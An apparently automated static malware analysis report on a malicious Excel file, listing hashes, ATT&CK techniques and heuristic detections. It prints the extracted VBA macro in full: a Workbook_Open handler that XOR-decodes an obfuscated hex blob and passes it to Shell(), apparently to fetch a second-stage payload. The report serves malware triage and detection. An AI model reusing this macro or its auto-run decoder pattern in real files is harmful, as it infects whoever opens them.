Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fd59749229dd9b0d…

MALICIOUS

Office (OLE)

172.5 KB Created: 2020-03-12 00:16:19 Authoring application: Microsoft Excel First seen: 2020-07-24
MD5: 830f58b71a4923027a18c591c8228cd6 SHA-1: 60ae6dba3eaab1abd9465f214e3a60be7a98d504 SHA-256: fd59749229dd9b0d1ccfca05e59f5b79b74aa765e629bb018724d87fb8b52c61
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The file contains VBA macros, specifically a Workbook_Open event handler that triggers a Shell() call. This indicates an attempt to execute arbitrary code, likely to download and run a second-stage payload. The reconstructed command string suggests persistence via a Run key entry.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3113 bytes
SHA-256: d838e34ffe45e6a763d5028de4ca06d246aacc2fdd12880328450e2dcf679025
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Public Sub Workbook_Open()
Dim ½´Ÿ§Dyà»Oª¾„ÇÈmm••…¼¹ñ×–¼±·î¹ŸXÂàø™·±˜…î·–±¤ìœìäNZN¾°±™ As String
Dim ä§Ã…ල…·ìâ´¾y¹Å–œ••¶˜¶€Ì¹¬†YÑà½NX¹îà䱧ÃÈî¹Ä±•‘§¬D½ñ• As String
Dim ±YO·Ç•¼™™Zà³ø×ÄwäD¼ZB±´™ÌDÂàp¨Ÿñ•··…¾O¹îà¹y¹·Z…±…½œ·wŸä As String
Dim •´…•¹m‚È•­ñoiœ¥øG•½¹ÇÕ§‘……Õ¼•½ŸÄ™·€…–´·B¶îÄA‚Z•ñس‚»ñÇ As String
Dim cc As String
Dim ·àNâò½½äñ¹Y½ñ•ñO´™¹ø閱ෟ՜…¾±p•Äà™½N½Zä·ì•½§Z½™¹¾YºŸ¾ As String
·àNâò½½äñ¹Y½ñ•ñO´™¹ø閱ෟ՜…¾±p•Äà™½N½Zä·ì•½§Z½™¹¾YºŸ¾ = (·àNâò½½äñ¹Y½ñ•ñO´™¹ø閱ෟ՜…¾±p•Äà™½N½Zä·ì•½§Z½™¹¾YºŸ¾ + (Replace(a(a("g", "262626" + ä§Ã…ල…·ìâ´¾y¹Å–œ••¶˜¶€Ì¹¬†YÑà½NX¹îà䱧ÃÈî¹Ä±•‘§¬D½ñ•), "222C25616E2261312E61070706060707060661362433610707060607070606613229242D2D6F243924616C24392422346107070606070706066135282E2F312E2D2822386123383120323261610707060607070606616C166109282525242F616C222E610707060607070606612C2C202F2561692F24366C2E232B2422356112383235242C6F0F24356F162423022D28242F35686F052E362F2D2E202507282D246966293535317B6E6E312E323028356F2F24356E3722376E7271777470766F243924666D65242F377B15242C316A661D2F2461070706060707060661362728610707060607070606612D246F04392466687A690F24366C0E232B242235616C22610707060607070606612E2C611229242D2D6F610707060607070606610031312D28222035282E2F686F1229242D2D043924223435246965242F377B1524610707060607070606612C316A661D2F24362761070706060707060661282D246F0439246668"), " FFGGFFGG " + cc, "")))
Shell (·àNâò½½äñ¹Y½ñ•ñO´™¹ø閱ෟ՜…¾±p•Äà™½N½Zä·ì•½§Z½™¹¾YºŸ¾)
End Sub
    Public Function a(CodeKey As String, DataIn As String) As String
        Dim lonDataPtr As Long
        Dim strDataOut As String
        Dim intXOrValue1 As Integer
        Dim intXOrValue2 As Integer
        For lonDataPtr = 1 To (Len(DataIn) / 2)
            intXOrValue1 = Val("&H" & (Mid$(DataIn, (2 * lonDataPtr) - 1, 2)))
            intXOrValue2 = Asc(Mid$(CodeKey, ((lonDataPtr Mod Len(CodeKey)) + 1), 1))
            strDataOut = strDataOut + Chr(intXOrValue1 Xor intXOrValue2)
        Next lonDataPtr
        a = strDataOut
    End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.